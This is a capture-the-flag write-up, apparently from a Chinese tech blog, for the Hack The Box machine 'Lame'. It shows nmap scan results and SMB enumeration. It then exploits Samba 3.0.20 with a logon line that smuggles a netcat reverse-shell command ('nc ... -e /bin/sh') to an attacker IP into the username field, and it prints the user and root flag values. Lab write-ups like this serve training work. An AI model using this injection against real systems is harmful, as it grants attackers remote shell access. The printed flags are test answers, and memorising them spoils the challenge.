当前位置: 首页 > news >正文

[Meachines] Lame smbd3.0-RCE

news 来源:原创 2024/9/20 0:34:15

信息收集

IP AddressOpening Ports
10.10.10.3TCP:21,22,139,445,3632

$ nmap -p- 10.10.10.3 --min-rate 1000 -sC -sV

21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.16.57
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name:
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2024-07-26T05:49:20-04:00
|_clock-skew: mean: 1h52m02s, deviation: 2h49m45s, median: -7m59s

Local&Root 权限

$ enum4linux 10.10.10.3

image-1.png

$ smbmap -H 10.10.10.3

image-2.png

$ smbclient //10.10.10.3/tmp

smb: \> logon "/=`nc 10.10.16.57 10032 -e /bin/sh`"

image-3.png

User.txt

image-4.png

76523648eeadf32972e21e2b375a3d61

Root.txt

image-5.png

38c7dbb369c9c855a5afc964693a5fa7

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 一文解决 | Linux(Ubuntn)系统安装 | 硬盘挂载 | 用户创建 | 生信分析配置
  • 可能是目前最全面的前端提测/自测标准
  • AI有关的学习和python
  • 数据结构-C语言-排序(4)
  • 测试工作中常听到的名词解释 : )
  • Java中的object类与objects类
  • paramiko 模块
  • 微信小程序-自定义tabBar
  • 认证中心:基于cookie和session实现单点登陆
  • 【后端开发实习】Python基于Quart框架实现SSE数据传输
  • 科普文:5种Linux下软件部署方式说明
  • 基于微信小程序+SpringBoot+Vue的自习室选座与门禁系统(带1w+文档)
  • git配置代理
  • 深入探索PHP框架:Symfony框架全面解析
  • 将Android Library项目发布到JitPack仓库
  • 《Java编程思想》读书笔记-对象导论
  • 「译」Node.js Streams 基础
  • 【391天】每日项目总结系列128(2018.03.03)
  • es6(二):字符串的扩展
  • JavaScript标准库系列——Math对象和Date对象(二)
  • JavaScript设计模式之工厂模式
  • js写一个简单的选项卡
  • LeetCode541. Reverse String II -- 按步长反转字符串
  • PAT A1120
  • rc-form之最单纯情况
  • SpiderData 2019年2月23日 DApp数据排行榜
  • swift基础之_对象 实例方法 对象方法。
  • 持续集成与持续部署宝典Part 2:创建持续集成流水线
  • 欢迎参加第二届中国游戏开发者大会
  • 可能是历史上最全的CC0版权可以免费商用的图片网站
  • 前嗅ForeSpider中数据浏览界面介绍
  • 如何抓住下一波零售风口?看RPA玩转零售自动化
  • 少走弯路,给Java 1~5 年程序员的建议
  • 最简单的无缝轮播
  • Java数据解析之JSON
  • Spring Batch JSON 支持
  • TPG领衔财团投资轻奢珠宝品牌APM Monaco
  • ### RabbitMQ五种工作模式:
  • #我与Java虚拟机的故事#连载19:等我技术变强了,我会去看你的 ​
  • $$$$GB2312-80区位编码表$$$$
  • (六) ES6 新特性 —— 迭代器(iterator)
  • (微服务实战)预付卡平台支付交易系统卡充值业务流程设计
  • (转)visual stdio 书签功能介绍
  • (转)可以带来幸福的一本书
  • .bat文件调用java类的main方法
  • .equals()到底是什么意思?
  • .net 7和core版 SignalR
  • .NET Project Open Day(2011.11.13)
  • .NET 反射的使用
  • .net 连接达梦数据库开发环境部署
  • .NET/C# 使用反射调用含 ref 或 out 参数的方法
  • .Net中的集合
  • .vue文件怎么使用_vue调试工具vue-devtools的安装
  • .w文件怎么转成html文件,使用pandoc进行Word与Markdown文件转化
  • /etc/sudoers (root权限管理)